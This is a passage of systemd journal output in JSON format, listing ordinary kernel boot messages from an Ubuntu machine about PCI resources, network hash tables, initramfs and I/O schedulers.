"ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:04", "_UDEV_SYSNAME" : "00:04", "_SOURCE_MONOTONIC_TIMESTAMP" : "409905", "MESSAGE" : "pnp 00:04: Plug and Play ACPI device, IDs PNP0501 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=133;b=e2b08827b5804427b422c10c84f1567e;m=56a1fc;t=5bd16dd1a2163;x=82c61eaf87e091e3", "__REALTIME_TIMESTAMP" : "1615280779960675", "__MONOTONIC_TIMESTAMP" : "5677564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "410192", "MESSAGE" : "pnp: PnP ACPI: found 5 devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=134;b=e2b08827b5804427b422c10c84f1567e;m=56a208;t=5bd16dd1a216f;x=b32a5fd21dfbf6c0", "__REALTIME_TIMESTAMP" : "1615280779960687", "__MONOTONIC_TIMESTAMP" : "5677576", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "418312", "MESSAGE" : "clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=135;b=e2b08827b5804427b422c10c84f1567e;m=56a2b2;t=5bd16dd1a221a;x=71898ba80ca4cc7d", "__REALTIME_TIMESTAMP" : "1615280779960858", "__MONOTONIC_TIMESTAMP" : "5677746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423093", "MESSAGE" : "pci_bus 0000:00: resource 4 [io 
0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=136;b=e2b08827b5804427b422c10c84f1567e;m=56a327;t=5bd16dd1a228f;x=9f1677c6e475c2ad", "__REALTIME_TIMESTAMP" : "1615280779960975", "__MONOTONIC_TIMESTAMP" : "5677863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423094", "MESSAGE" : "pci_bus 0000:00: resource 5 [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=137;b=e2b08827b5804427b422c10c84f1567e;m=56a3c5;t=5bd16dd1a232d;x=9c27a678ac93cc5c", "__REALTIME_TIMESTAMP" : "1615280779961133", "__MONOTONIC_TIMESTAMP" : "5678021", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423095", "MESSAGE" : "pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=138;b=e2b08827b5804427b422c10c84f1567e;m=56a44b;t=5bd16dd1a23b3;x=d0ab404cb0387262", "__REALTIME_TIMESTAMP" : "1615280779961267", "__MONOTONIC_TIMESTAMP" : "5678155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423096", "MESSAGE" : "pci_bus 0000:00: resource 7 [mem 
0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=139;b=e2b08827b5804427b422c10c84f1567e;m=56a4c1;t=5bd16dd1a2428;x=722c89e8012a5aec", "__REALTIME_TIMESTAMP" : "1615280779961384", "__MONOTONIC_TIMESTAMP" : "5678273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423097", "MESSAGE" : "pci_bus 0000:00: resource 8 [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13a;b=e2b08827b5804427b422c10c84f1567e;m=56a4d3;t=5bd16dd1a243a;x=114a06ded6048837", "__REALTIME_TIMESTAMP" : "1615280779961402", "__MONOTONIC_TIMESTAMP" : "5678291", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "423173", "MESSAGE" : "NET: Registered protocol family 2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13b;b=e2b08827b5804427b422c10c84f1567e;m=56a4de;t=5bd16dd1a2446;x=3e6d81c3cbbcd13", "__REALTIME_TIMESTAMP" : "1615280779961414", "__MONOTONIC_TIMESTAMP" : "5678302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "425901", "MESSAGE" : "TCP established hash table entries: 16384 (order: 5, 131072 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13c;b=e2b08827b5804427b422c10c84f1567e;m=56a4fc;t=5bd16dd1a2463;x=6147d9603b4d9b", "__REALTIME_TIMESTAMP" : "1615280779961443", 
"__MONOTONIC_TIMESTAMP" : "5678332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "429777", "MESSAGE" : "TCP bind hash table entries: 16384 (order: 6, 262144 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13d;b=e2b08827b5804427b422c10c84f1567e;m=56a516;t=5bd16dd1a247d;x=97f84b1d02a96c2f", "__REALTIME_TIMESTAMP" : "1615280779961469", "__MONOTONIC_TIMESTAMP" : "5678358", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "433287", "MESSAGE" : "TCP: Hash tables configured (established 16384 bind 16384)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13e;b=e2b08827b5804427b422c10c84f1567e;m=56a520;t=5bd16dd1a2487;x=d4e96f4c933619c5", "__REALTIME_TIMESTAMP" : "1615280779961479", "__MONOTONIC_TIMESTAMP" : "5678368", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "436714", "MESSAGE" : "UDP hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13f;b=e2b08827b5804427b422c10c84f1567e;m=56a52a;t=5bd16dd1a2491;x=41b21a0bbc5a2cab", "__REALTIME_TIMESTAMP" : "1615280779961489", "__MONOTONIC_TIMESTAMP" : "5678378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "439824", "MESSAGE" : 
"UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=140;b=e2b08827b5804427b422c10c84f1567e;m=56a534;t=5bd16dd1a249b;x=73da792df9470e3e", "__REALTIME_TIMESTAMP" : "1615280779961499", "__MONOTONIC_TIMESTAMP" : "5678388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "443248", "MESSAGE" : "NET: Registered protocol family 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=141;b=e2b08827b5804427b422c10c84f1567e;m=56a5c7;t=5bd16dd1a252e;x=658e67453d376da9", "__REALTIME_TIMESTAMP" : "1615280779961646", "__MONOTONIC_TIMESTAMP" : "5678535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "445582", "MESSAGE" : "pci 0000:00:00.0: Limiting direct PCI/PCI transfers" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=142;b=e2b08827b5804427b422c10c84f1567e;m=56a65c;t=5bd16dd1a25c3;x=595f41ddd1f2a821", "__REALTIME_TIMESTAMP" : "1615280779961795", "__MONOTONIC_TIMESTAMP" : "5678684", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "448568", "MESSAGE" : "pci 0000:00:01.0: PIIX3: Enabling Passive Release" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=143;b=e2b08827b5804427b422c10c84f1567e;m=56a704;t=5bd16dd1a266c;x=75d157c138f23e2c", "__REALTIME_TIMESTAMP" : "1615280779961964", "__MONOTONIC_TIMESTAMP" : "5678852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "451465", "MESSAGE" : "pci 0000:00:01.0: Activating ISA DMA hang workarounds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=144;b=e2b08827b5804427b422c10c84f1567e;m=56a712;t=5bd16dd1a2679;x=3a7b2a2a2ef66c73", "__REALTIME_TIMESTAMP" : "1615280779961977", "__MONOTONIC_TIMESTAMP" : "5678866", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "479755", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=145;b=e2b08827b5804427b422c10c84f1567e;m=56a78b;t=5bd16dd1a26f3;x=31bf186027993c3d", "__REALTIME_TIMESTAMP" : "1615280779962099", "__MONOTONIC_TIMESTAMP" : "5678987", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "507251", "MESSAGE" : "pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=146;b=e2b08827b5804427b422c10c84f1567e;m=56a799;t=5bd16dd1a2700;x=21fcaca2e8065e0f", "__REALTIME_TIMESTAMP" : "1615280779962112", "__MONOTONIC_TIMESTAMP" : "5679001", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "511431", "MESSAGE" : "PCI: CLS 0 bytes, default 64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=147;b=e2b08827b5804427b422c10c84f1567e;m=56a7a4;t=5bd16dd1a270b;x=e18d87de9a174e67", "__REALTIME_TIMESTAMP" : "1615280779962123", "__MONOTONIC_TIMESTAMP" : "5679012", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "511497", "MESSAGE" : "Unpacking initramfs..." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=148;b=e2b08827b5804427b422c10c84f1567e;m=56a7ae;t=5bd16dd1a2715;x=34e7746456cde406", "__REALTIME_TIMESTAMP" : "1615280779962133", "__MONOTONIC_TIMESTAMP" : "5679022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "820583", "MESSAGE" : "Freeing initrd memory: 19144K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=149;b=e2b08827b5804427b422c10c84f1567e;m=56a7d8;t=5bd16dd1a2740;x=5311d723c461c786", "__REALTIME_TIMESTAMP" : "1615280779962176", "__MONOTONIC_TIMESTAMP" : "5679064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "822860", "MESSAGE" : "clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1e45270b174, max_idle_ns: 440795290368 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14a;b=e2b08827b5804427b422c10c84f1567e;m=56a7e4;t=5bd16dd1a274c;x=7be0fc3755f665ff", "__REALTIME_TIMESTAMP" : "1615280779962188", "__MONOTONIC_TIMESTAMP" : "5679076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "827749", "MESSAGE" : "Scanning for low memory corruption every 60 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14b;b=e2b08827b5804427b422c10c84f1567e;m=56a7ef;t=5bd16dd1a2757;x=3cb141ae816e568", "__REALTIME_TIMESTAMP" : "1615280779962199", "__MONOTONIC_TIMESTAMP" : "5679087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : 
"5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "831232", "MESSAGE" : "Initialise system trusted keyrings" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14c;b=e2b08827b5804427b422c10c84f1567e;m=56a7ff;t=5bd16dd1a2766;x=95dc4b6c01d1635b", "__REALTIME_TIMESTAMP" : "1615280779962214", "__MONOTONIC_TIMESTAMP" : "5679103", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "833536", "MESSAGE" : "Key type blacklist registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14d;b=e2b08827b5804427b422c10c84f1567e;m=56a80a;t=5bd16dd1a2772;x=f83460486555e757", "__REALTIME_TIMESTAMP" : "1615280779962226", "__MONOTONIC_TIMESTAMP" : "5679114", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "835536", "MESSAGE" : "workingset: timestamp_bits=36 max_order=19 bucket_order=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14e;b=e2b08827b5804427b422c10c84f1567e;m=56a816;t=5bd16dd1a277d;x=c5140dbfdb532134", "__REALTIME_TIMESTAMP" : "1615280779962237", "__MONOTONIC_TIMESTAMP" : "5679126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "839847", "MESSAGE" : "zbud: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14f;b=e2b08827b5804427b422c10c84f1567e;m=56a821;t=5bd16dd1a2788;x=6aa5a866a54b4f6f", 
"__REALTIME_TIMESTAMP" : "1615280779962248", "__MONOTONIC_TIMESTAMP" : "5679137", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "841736", "MESSAGE" : "squashfs: version 4.0 (2009/01/31) Phillip Lougher" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=150;b=e2b08827b5804427b422c10c84f1567e;m=56a82b;t=5bd16dd1a2793;x=3c2d75adcdd0eb95", "__REALTIME_TIMESTAMP" : "1615280779962259", "__MONOTONIC_TIMESTAMP" : "5679147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "844673", "MESSAGE" : "fuse init (API version 7.26)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=151;b=e2b08827b5804427b422c10c84f1567e;m=56a836;t=5bd16dd1a279e;x=28d57277178b50dc", "__REALTIME_TIMESTAMP" : "1615280779962270", "__MONOTONIC_TIMESTAMP" : "5679158", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "847472", "MESSAGE" : "Key type asymmetric registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=152;b=e2b08827b5804427b422c10c84f1567e;m=56a850;t=5bd16dd1a27b8;x=40d8d771ff08ccfa", "__REALTIME_TIMESTAMP" : "1615280779962296", "__MONOTONIC_TIMESTAMP" : "5679184", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "849648", "MESSAGE" : "Asymmetric key 
parser 'x509' registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=153;b=e2b08827b5804427b422c10c84f1567e;m=56a85b;t=5bd16dd1a27c3;x=317efab2144cd854", "__REALTIME_TIMESTAMP" : "1615280779962307", "__MONOTONIC_TIMESTAMP" : "5679195", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "852179", "MESSAGE" : "Block layer SCSI generic (bsg) driver version 0.4 loaded (major 246)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=154;b=e2b08827b5804427b422c10c84f1567e;m=56a866;t=5bd16dd1a27cd;x=fdb3901705b7c0c9", "__REALTIME_TIMESTAMP" : "1615280779962317", "__MONOTONIC_TIMESTAMP" : "5679206", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "856083", "MESSAGE" : "io scheduler noop registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=155;b=e2b08827b5804427b422c10c84f1567e;m=56a870;t=5bd16dd1a27d8;x=3ae086dee1bc9bf0", "__REALTIME_TIMESTAMP" : "1615280779962328", "__MONOTONIC_TIMESTAMP" : "5679216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "858210", "MESSAGE" : "io scheduler deadline registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=156;b=e2b08827b5804427b422c10c84f1567e;m=56a87e;t=5bd16dd1a27e6;x=a7bf049c758daa9c", "__REALTIME_TIMESTAMP" : "1615280779962342", "__MONOTONIC_TIMESTAMP" : "5679230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "860598", "MESSAGE" : "io scheduler cfq registered (default)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=157;b=e2b08827b5804427b422c10c84f1567e;m=56a889;t=5bd16dd1a27f0;x=62b6dd90bf32f5c", "__REALTIME_TIMESTAMP" : "1615280779962352", "__MONOTONIC_TIMESTAMP" : "5679241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "863243", "MESSAGE" : "intel_idle: Please enable MWAIT in BIOS SETUP" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=158;b=e2b08827b5804427b422c10c84f1567e;m=56a894;t=5bd16dd1a27fb;x=9579224210b193a0", "__REALTIME_TIMESTAMP" : "1615280779962363", "__MONOTONIC_TIMESTAMP" : "5679252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "863357", "MESSAGE" : "input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=159;b=e2b08827b5804427b422c10c84f1567e;m=56a89e;t=5bd16dd1a2806;x=faabb4a05e54fe68", 